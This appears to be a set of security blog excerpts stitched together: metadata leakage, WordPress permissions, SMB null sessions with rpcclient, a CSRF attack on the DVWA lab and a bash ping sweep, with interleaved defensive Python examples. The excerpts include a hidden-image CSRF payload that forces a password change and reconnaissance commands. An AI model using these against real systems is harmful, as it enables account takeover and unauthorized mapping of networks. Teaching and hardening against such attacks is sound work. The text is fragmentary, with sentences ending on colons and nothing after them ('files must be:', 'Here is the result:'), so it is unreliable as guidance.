Metadata is information stored inside a document itself but not easy to find for ordinary users. That information usually includes: file name, type and size, author, organization, creation date, last modified date and so on. But sometimes there is extra information that can be very interesting from a hacker's point of view, such as email addresses, phone numbers, usernames, geolocation and even local IP addresses.
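As an added example (not code from the original post), here is a small Python script that shows what the fields just described look like inside a document's own metadata, using the Info dictionary of a constructed PDF fragment, and that blanks them before the file is published. The sample bytes, the key list and the function names are constructed for this example; the scrub keeps every entry's byte length so the original cross-reference offsets stay valid.

```python
import re

# Info-dictionary keys that typically carry the kind of data the post warns about
# (constructed list for this example; /Author and /Creator often reveal usernames and software)
SENSITIVE_KEYS = {"Title", "Subject", "Author", "Keywords", "Creator", "Producer",
                  "CreationDate", "ModDate", "Company"}

# One "/Key (literal string)" entry; handles escaped parens such as \) inside the string
INFO_ENTRY = re.compile(rb"/([A-Za-z]+)\s*\(((?:\\.|[^\\)])*)\)")

# Constructed sample: a minimal PDF fragment with an Info dictionary (not a real document)
PDF_SAMPLE = (
    b"%PDF-1.4\n"
    b"1 0 obj\n"
    b"<< /Title (Quarterly report) /Author (jdoe) /Creator (Microsoft Word)\n"
    b"   /Producer (Acrobat Distiller 9) /CreationDate (D:20140312101500+01'00') >>\n"
    b"endobj\n"
    b"trailer\n"
    b"<< /Info 1 0 R >>\n"
    b"%%EOF\n"
)


def extract_pdf_info(data: bytes) -> dict:
    """Return every sensitive literal-string entry found in the file's dictionaries."""
    found = {}
    for body in re.findall(rb"<<(.*?)>>", data, re.DOTALL):
        for key, value in INFO_ENTRY.findall(body):
            name = key.decode("ascii")
            if name in SENSITIVE_KEYS:
                found[name] = value.decode("latin-1")
    return found


def scrub_pdf_info(data: bytes) -> bytes:
    """Blank sensitive values in place, keeping each entry's byte length so the
    cross-reference offsets of the original file stay valid."""
    def blank(match: re.Match) -> bytes:
        key, value = match.group(1), match.group(2)
        if key.decode("ascii") not in SENSITIVE_KEYS:
            return match.group(0)
        # everything up to the value, then same-length padding, then the closing paren
        return match.group(0)[: -(len(value) + 1)] + b" " * len(value) + b")"
    return INFO_ENTRY.sub(blank, data)


if __name__ == "__main__":
    for key, value in extract_pdf_info(PDF_SAMPLE).items():
        print(f"{key:13s} {value}")
    scrubbed = scrub_pdf_info(PDF_SAMPLE)
    print("after scrub:", extract_pdf_info(scrubbed))
```

Real documents keep this data in several places (XMP streams in PDFs, docProps/*.xml in Office files, EXIF in images), so a production check would cover each container; the point here is that the values a search engine or a reader never shows are still sitting in the bytes you publish.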
With more than 60 million websites, WordPress is the most popular CMS currently in use, but it also runs on the most attacked environment around, aka LAMP.
As we all know, there is no way to stop a determined hacker, but you can slow him down or detect him before things become serious. Below are some techniques to improve the security of your site. This post is directly inspired by the official WordPress Codex and by some hacker techniques I have learned over the last few months.
According to the WordPress documentation (a point I won't discuss here), directories must have the following permissions:
drwxr-xr-x (755) and files must be:
WordPress says that automatic updates change file/dir permissions; that's true, but not that way in my case. Maybe a cron job could do it?
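As an added example (not from the post or from WordPress itself), the following Python script is the kind of check a cron job could run: it walks an install, reports every directory or file whose mode deviates from the baseline, and can reset the tree to that baseline. The baseline is an assumption taken from the WordPress hardening guide (directories 755, files 644, wp-config.php no wider than 640); the demo tree, its wrong modes and the function names are constructed for this example.

```python
import os
import stat
import tempfile
from pathlib import Path

# Baseline assumed for this example, from the WordPress hardening guide:
# directories 755, files 644, wp-config.php (database credentials) no wider than 640.
DIR_MODE = 0o755
FILE_MODE = 0o644
CONFIG_MAX_MODE = 0o640
OTHER_WRITABLE = stat.S_IWGRP | stat.S_IWOTH


def audit_permissions(root: str) -> list:
    """Walk a WordPress install and list every path whose mode deviates from the baseline.
    Each finding is (path relative to root, actual mode as octal text, reason)."""
    root_path = Path(root)
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames:
            p = Path(dirpath) / name
            if p.is_symlink():
                continue
            mode = stat.S_IMODE(p.lstat().st_mode)
            if mode != DIR_MODE:
                findings.append((str(p.relative_to(root_path)), oct(mode), "directory should be 755"))
        for name in filenames:
            p = Path(dirpath) / name
            if p.is_symlink():
                continue
            mode = stat.S_IMODE(p.lstat().st_mode)
            rel = str(p.relative_to(root_path))
            if name == "wp-config.php":
                # any bit outside 640 means the secrets are readable or writable by others
                if mode & ~CONFIG_MAX_MODE:
                    findings.append((rel, oct(mode), "wp-config.php readable or writable by others"))
            elif mode & OTHER_WRITABLE:
                findings.append((rel, oct(mode), "writable by group or others"))
            elif mode != FILE_MODE:
                findings.append((rel, oct(mode), "file should be 644"))
    return sorted(findings)


def apply_baseline(root: str) -> int:
    """Reset every path under root to the baseline; returns the number of chmod calls.
    This is what a cron job would run after an automatic update changed modes."""
    changed = 0
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames:
            os.chmod(Path(dirpath) / name, DIR_MODE)
            changed += 1
        for name in filenames:
            target = CONFIG_MAX_MODE if name == "wp-config.php" else FILE_MODE
            os.chmod(Path(dirpath) / name, target)
            changed += 1
    return changed


def make_demo_site() -> str:
    """Constructed WordPress-like tree with deliberately wrong modes (demo data only)."""
    root = tempfile.mkdtemp(prefix="wp-demo-")
    dirs = {"wp-content": DIR_MODE, "wp-content/uploads": 0o777}   # uploads far too open
    files = {
        "index.php": FILE_MODE,
        "wp-config.php": 0o644,                  # secrets readable by every local user
        "wp-content/uploads/photo.jpg": 0o666,   # world-writable
    }
    for rel, mode in dirs.items():
        path = Path(root, rel)
        path.mkdir()
        path.chmod(mode)
    for rel, mode in files.items():
        path = Path(root, rel)
        path.write_text("demo\n")
        path.chmod(mode)
    return root


if __name__ == "__main__":
    site = make_demo_site()
    for rel, mode, reason in audit_permissions(site):
        print(f"{mode}  {rel}: {reason}")
    apply_baseline(site)
    print("after fix:", audit_permissions(site))
```

Point it at the document root of a real install and run it from cron; a non-empty report after an update is exactly the situation the paragraph above describes.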
While performing a pentest, if you discover a server running the SMB protocol, you can test whether it is vulnerable to anonymous connections (also called null sessions) and then glean a lot of information with an RPC client. Nmap is useful to locate that kind of service:
Now you can try to interact with the remote machine with the help of rpcclient. To perform a null session you have to specify an empty user and an empty password. If the host is not vulnerable, you will get the following error:
$ rpcclient -U "" 192.168.1.31
Enter 's password:
could not initialise lsa pipe. Error was NT_STATUS_ACCESS_DENIED
could not obtain sid for domain WORKGROUP error: NT_STATUS_ACCESS_DENIED
But if the host is vulnerable you will immediately get a prompt:
$ rpcclient -U "" 192.168.1.18
Enter 's password:
rpcclient $>
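From the defender's side, the null session above succeeds because the server accepts an anonymous IPC$ connection. As an added example (not from the post), here is a Python check that reads a Samba smb.conf and flags the settings that allow that: "restrict anonymous" left at its default of 0, "map to guest" turning failed logins into guest access, and shares with "guest ok = yes". The two configuration fragments are constructed for this example; the parameter names and defaults are Samba's own, and the recommendation of "restrict anonymous = 2" is this example's assumption based on the Samba documentation (it can break browsing for some older clients, so test it).

```python
import configparser

# Constructed smb.conf fragments for this example (not from the post)
WEAK_SMB_CONF = """\
[global]
workgroup = WORKGROUP
server string = File server
security = user
# unknown users silently become guest, and restrict anonymous is left at its default of 0
map to guest = Bad User

[public]
path = /srv/public
guest ok = yes
"""

HARDENED_SMB_CONF = """\
[global]
workgroup = WORKGROUP
security = user
restrict anonymous = 2
map to guest = Never

[data]
path = /srv/data
guest ok = no
valid users = @staff
"""


def audit_smb_conf(text: str) -> list:
    """Flag settings that let an unauthenticated client open a null session or read shares."""
    cp = configparser.ConfigParser(interpolation=None, strict=False,
                                   inline_comment_prefixes=(";", "#"))
    cp.read_string(text)
    findings = []
    g = cp["global"] if cp.has_section("global") else {}
    # Samba defaults: restrict anonymous = 0, map to guest = Never, guest ok = no
    ra = g.get("restrict anonymous", "0").strip()
    if ra != "2":
        findings.append(f"[global] restrict anonymous = {ra}: anonymous IPC$ connections "
                        "allowed, set it to 2")
    mtg = g.get("map to guest", "Never").strip().lower()
    if mtg != "never":
        findings.append(f"[global] map to guest = {mtg}: failed logins fall back to guest")
    for share in cp.sections():
        if share == "global":
            continue
        if cp[share].get("guest ok", "no").strip().lower() in ("yes", "true", "1"):
            findings.append(f"[{share}] guest ok = yes: share readable without credentials")
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_SMB_CONF), ("hardened", HARDENED_SMB_CONF)):
        print(label, audit_smb_conf(conf) or "no findings")
```

After changing smb.conf, the rpcclient test from the post is the quickest way to confirm the fix: the hardened host should answer with NT_STATUS_ACCESS_DENIED rather than a prompt.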
Cross-Site Request Forgery, aka CSRF, is an attack unintentionally triggered by the user himself. It sends HTTP requests to execute unexpected actions in different ways: through an img tag to perform GET requests, or with Ajax requests when POST is required.
You can learn basic CSRF in DVWA.
To perform this CSRF you first need to log in; then you must visit a malicious site that performs a stealthy HTTP request submitting the change-password form with specific values.
The original request can be found by using a local proxy like Burp Suite or analyzing HTTP headers with a browser extension like Live HTTP Headers. The payload:
<html>
<head>
<title>My malicious website</title>
</head>
<body>
<p>It works like a charm!</p>
<img src="http://local.dvwa.com/vulnerabilities/csrf/?password_new=azerty&password_conf=azerty&Change=Change" width="1" height="1" />
</body>
</html>
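As an added example (not code from the post or from DVWA), the Python below models the server side of that form twice: a handler that honours any request from a logged-in user, which is why the hidden img tag works, and a hardened one that only accepts POST and requires the per-session token the server placed in the form, compared in constant time. The forged parameters are taken from the img src in the payload above; the session layout, the parameter name user_token and the function names are assumptions for this example.

```python
import hmac
import secrets
from urllib.parse import parse_qsl, urlparse

# The forged request from the post's payload (the img tag's src), parsed into parameters
PAYLOAD_URL = ("http://local.dvwa.com/vulnerabilities/csrf/"
               "?password_new=azerty&password_conf=azerty&Change=Change")
FORGED_PARAMS = dict(parse_qsl(urlparse(PAYLOAD_URL).query))


def new_session(user: str) -> dict:
    """Server-side session: login state plus a per-session anti-CSRF token (assumed layout)."""
    return {"user": user, "csrf_token": secrets.token_hex(16)}


def _apply_change(users: dict, session: dict, params: dict) -> str:
    if params.get("password_new") and params["password_new"] == params.get("password_conf"):
        users[session["user"]] = params["password_new"]
        return "Password Changed."
    return "Passwords did not match."


def change_password_vulnerable(users: dict, session: dict, params: dict, method: str) -> str:
    """Behaves like the form the post attacks: any request from a logged-in browser is
    honoured, whatever its method or origin, so the hidden img tag succeeds."""
    return _apply_change(users, session, params)


def change_password_hardened(users: dict, session: dict, params: dict, method: str) -> str:
    """Same action with two checks: state changes only over POST, and the form must carry
    the token the server issued to this session. A cross-site page cannot read that token
    (same-origin policy), so neither the img/GET trick nor a cross-site Ajax POST passes."""
    if method != "POST":
        return "Method Not Allowed"
    token = params.get("user_token", "")
    if not hmac.compare_digest(token, session["csrf_token"]):
        return "CSRF token is incorrect"
    return _apply_change(users, session, params)


if __name__ == "__main__":
    users = {"admin": "password"}
    session = new_session("admin")
    print("vulnerable, forged GET:", change_password_vulnerable(users, session, FORGED_PARAMS, "GET"), users)
    users["admin"] = "password"
    print("hardened, forged GET  :", change_password_hardened(users, session, FORGED_PARAMS, "GET"))
    print("hardened, forged POST :", change_password_hardened(users, session, FORGED_PARAMS, "POST"))
    genuine = dict(FORGED_PARAMS, user_token=session["csrf_token"])
    print("hardened, real form   :", change_password_hardened(users, session, genuine, "POST"), users)
```

Rejecting GET alone is not enough, since the post notes that Ajax can issue the POST; the token is what ties the request to a form the real site rendered for this user.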
In the second part of the first phase of a penetration test, active information gathering, it's important to map the network of your target as accurately as possible. To find live hosts there is a technique called ping sweep. Different tools exist to perform that task.
ping can give you the IP address of the target, the TTL and the round-trip time. However, since the method is based on ICMP requests, the target could be configured to block or discard them. With a simple bash script, you can loop through a range of IP addresses to test them all:
#!/bin/bash
# Ping each host of the range once; the trailing & backgrounds each ping so they run in parallel
for ip in $(seq 200 220); do
    ping -c 1 192.168.11.$ip | grep "bytes from" | cut -d " " -f 4 | cut -d ":" -f1 &
done
wait   # let every background ping finish before the script exits
The -c option is set to send only 1 request. grep is used to display only the hosts that respond to the request (and are presumed alive), and finally cut is used for a nice display. Notice the & at the end of the line: it's very useful to parallelize tasks and make the script faster. Here is the result: